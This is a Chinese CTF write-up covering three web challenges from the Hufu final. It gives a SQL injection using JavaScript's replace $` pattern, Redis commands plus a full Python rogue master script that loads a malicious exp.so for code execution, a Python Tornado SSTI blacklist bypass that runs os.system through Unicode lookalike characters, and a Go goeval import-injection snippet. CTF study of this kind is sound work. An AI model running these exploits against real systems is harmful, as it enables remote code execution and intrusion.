虎符决赛

虎符决赛

manager

nodejs的replace函数存在$匹配符,可绕过双引号过滤。
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/replace#description
然后联合查询让查出来的密码和输入密码相等即可

1
name=$`union select '2','2';--+&password=2

登录之后发现可疑的url,发现这是个应用Rocket.Chat,下载之后连接即可。需要在hosts文件中把secret-chat.manager.icq和题目ip绑定

在这里插入图片描述

注册登录之后发现写了一个robot,并且可以执行redis命令。利用恶意redis服务器打主从复制

1
2
3
config set dir /tmp
config set dbfilename exp.so
slaveof vps port

恶意服务脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
#!/usr/local/bin python
#coding=utf8
import socket
import time

CRLF="\r\n"
payload=open("exp.so","rb").read()
exp_filename="exp.so"

def redis_format(arr):
    global CRLF
    global payload
    redis_arr=arr.split(" ")
    cmd=""
    cmd+="*"+str(len(redis_arr))
    for x in redis_arr:
        cmd+=CRLF+"$"+str(len(x))+CRLF+x
    cmd+=CRLF
    return cmd

def redis_connect(rhost,rport):
    sock=socket.socket()
    sock.connect((rhost,rport))
    return sock

def send(sock,cmd):
    sock.send(redis_format(cmd))
    print(sock.recv(1024).decode("utf-8"))

def RogueServer(lport):
    global CRLF
    global payload
    flag=True
    result=""
    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.bind(("0.0.0.0",lport))
    sock.listen(10)
    clientSock, address = sock.accept()

    print("\033[92m[+]\033[0m Accepted connection from {}:{}".format(address[0], address[1]))

    while flag:
        data = clientSock.recv(1024)
        print(data)
        if "PING" in data.decode():
            result="+PONG"+CRLF
            clientSock.send(result)
            flag=True
            print(result)
        elif "REPLCONF" in data:
            result="+OK"+CRLF
            clientSock.send(result)
            flag=True
            print(result)
        elif "PSYNC" in data or "SYNC" in data:
            result = "+FULLRESYNC " + "a" * 40 + " 1" + CRLF
            result += "$" + str(len(payload)) + CRLF
            result = result.encode()
            result += payload
            result += CRLF
            clientSock.send(result)
            print("\033[92m[+]\033[0m FULLRESYNC ...")
            flag=False
            #print(result)

    print("\033[92m[+]\033[0m It's done")

if __name__=="__main__":

    lport=2333
    RogueServer(lport)

执行命令知州读取flag即可
在这里插入图片描述

龙卷风

python的tornado框架ssti注入,但是黑名单几乎把可以利用的都ban了

1
2
3
4
5
6
7
8
black_func = ['eval', 'os', 'chr', 'class', 'compile', 'dir', 'exec', 'filter', 'attr', 'globals', 'help',
              'input', 'local', 'memoryview', 'open', 'print', 'property', 'reload', 'object', 'reduce', 'repr',
              'method', 'super', "flag", "file", "decode","request","builtins","|","&"]

black_symbol = ["__", "'", '"', "$", "*", ",", ".","\\","0x","0o","/","+","*"]
black_keyword = ['or', 'while']
black_rce = ['render', 'module', 'include','if', 'extends', 'set', 'raw', 'try', 'except', 'else', 'finally',
             'while', 'for', 'from', 'import', 'apply',"True","False"]

发现可以利用unicode进行绕过,但是点号引号不知道怎么绕过了。赛后学习到了可以用request请求中携带我们需要执行的命令,然后利用eval(repr(request)[x:x]来获取url中的命令字符串并用eval执行命令。

脚本如下,切片的长度需要本地给黑名单去了先调试一下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#coding: utf-8
import requests

alphabet_encoded = "𝟎𝟏𝟐𝟑𝟒𝟓𝟔𝟕𝟖𝟗𝐚𝐛𝐜𝐝𝐞𝐟𝐠𝐡𝐢𝐣𝐤𝐥𝐦𝐧𝐨𝐩𝐪𝐫𝐬𝐭𝐮𝐯𝐰𝐱𝐲𝐳𝐀𝐁𝐂𝐃𝐄𝐅𝐆𝐇𝐈𝐉𝐊𝐋𝐌𝐍𝐎𝐏𝐐𝐑𝐒𝐓𝐔𝐕𝐖𝐗𝐘𝐙ꓸ"
alphabet = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ."
bold_translation = str.maketrans(alphabet, alphabet_encoded)


# payload = "{{RequestHandlerꓸsettings}}"
payload = "eval(repr(request)"
print(payload.translate(bold_translation))


payload = r"__import__('os').system(chr(108)+chr(115)+chr(32)+chr(47)+chr(32)+chr(62)+chr(32)+chr(47)+chr(97)+chr(112)+chr(112)+chr(47)+chr(115)+chr(116)+chr(97)+chr(116)+chr(105)+chr(99)+chr(47)+chr(104)+chr(97)+chr(104)+chr(97)+chr(49)+chr(46)+chr(116)+chr(120)+chr(116))"

# ls / > /app/static/haha1.txt
burp0_url = "http://127.0.0.1:8888/?aaa=" + payload
burp0_data = {"tornado": "{{𝐞𝐯𝐚𝐥(𝐫𝐞𝐩𝐫(𝐫𝐞𝐪𝐮𝐞𝐬𝐭)[84:"+ str(84 + len(payload)) +"])}}"}
print(burp0_data)
r = requests.post(burp0_url, data=burp0_data)

print(r.text)

在这里插入图片描述

readygo

过滤了大小写字母,最后面存在 eval.Eval执行命令
在这里插入图片描述
在 eval.go源码里面importStr并没有过滤限制,并且是进行的简单字符串拼接。所以我们可以将后面的func注释掉,自己写func函数然后执行命令。
在这里插入图片描述
测试代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
package main

import (
	"fmt"
	"regexp"
	eval "github.com/PaulXu-cn/goeval"
)

func main() {
	Package := "os/exec\"\n\"fmt\")\nfunc\nmain()\x09{cmd:=exec.Command(\"ls\",\"-l\",\"/\")\nout,_:=cmd.CombinedOutput()\nfmt.Println(string(out))/*"
	expression := "*///"
	match, _ := regexp.MatchString("([a-zA-Z]+)", expression)
	if match {
		fmt.Print("Hacker????")
		return
	} else {
		if res, err := eval.Eval("", "fmt.Print("+expression+")", Package); nil == err {
			fmt.Println(string(res))
		} else {
			fmt.Println("Error")
			fmt.Print(err)
		}
	}
}

ctf
ctf web

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!